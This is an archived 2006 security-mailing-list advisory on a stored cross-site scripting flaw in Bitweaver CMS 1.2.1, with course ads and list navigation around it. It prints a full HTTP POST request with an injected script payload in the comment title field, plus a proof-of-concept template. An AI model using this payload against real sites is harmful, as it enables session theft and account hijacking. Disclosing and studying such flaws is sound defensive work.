Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] Bitweaver CMS User Comment Title XSS

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] Bitweaver CMS User Comment Title XSS
Date: 6 Mar 2006 13:04:54 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Bitweaver CMS User Comment Title XSS
------------------------------------------------------------------------


SUMMARY

"bitweaver is an application framework for content management. "

Improper user input handling in Bitweaver CMS allows attackers to exploit 
a Cross Site Scripting.

DETAILS

Vulnerable Systems:
 * Bitweaver CMS version 1.2.1

Bitweaver contains a flaw that allows a cross site scripting attack.
The vulnerability is found in the title of the registered user comment 
page and the user can modify the function POST and insert the XSS code

- HTTP POST request -

http://[target]/[patch]/read.php?article_id=7#editcomments
POST /articles/read.php?article_id=7 HTTP/1.1
Host: http://[target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) 
Gecko/20050919 Firefox/1.0.7
Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/articles/read.php?article_id=7
Cookie: mod_usertrack=82.56.164.250.1141558144377994; 
BWSESSION=v5a6krvki42h0puv48dc5coki0; tz_offset=3600; 
tiki-user-bitweaver=616706c4d6f7bdf68b30893f860cbb2b
Content-Type: application/x-www-form-urlencoded
Content-Length: 265
tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id=&comment_title=hacking&comment_data=[your_name_logged]&post_comment_submit=Post

The modified code can be as follows:

tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id=&comment_title=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E&comment_data=[your_name_logged]&post_comment_submit=Post

Proof of Concept:
For this exploit you must be registred at the site.
For using the parameters bellow, attackers should change some of the given 
parameters for his/her user on the cms:

tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id=&comment_title=[XSS]&comment_data=[your_name_logged]&post_comment_submit=Post


ADDITIONAL INFORMATION

The information has been provided by  <mailto:federico.sana@alice.it> 
Kiki.
The original article can be found at:  
<http://kiki91.altervista.org/exploit/bitweaver_1.2.1_XSS.txt> 
http://kiki91.altervista.org/exploit/bitweaver_1.2.1_XSS.txt



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Bitweaver CMS User Comment Title XSS, SecuriTeam <=
Previous by Date:  [EXPL] Invision Power Board Password Change SQL-Injection Exploit, SecuriTeam
Next by Date:  [NEWS] Apple Mac OS X File Rewrites and Privilege Escalation, SecuriTeam
Previous by Thread:  [EXPL] Invision Power Board Password Change SQL-Injection Exploit, SecuriTeam
Next by Thread:  [NEWS] Apple Mac OS X File Rewrites and Privilege Escalation, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]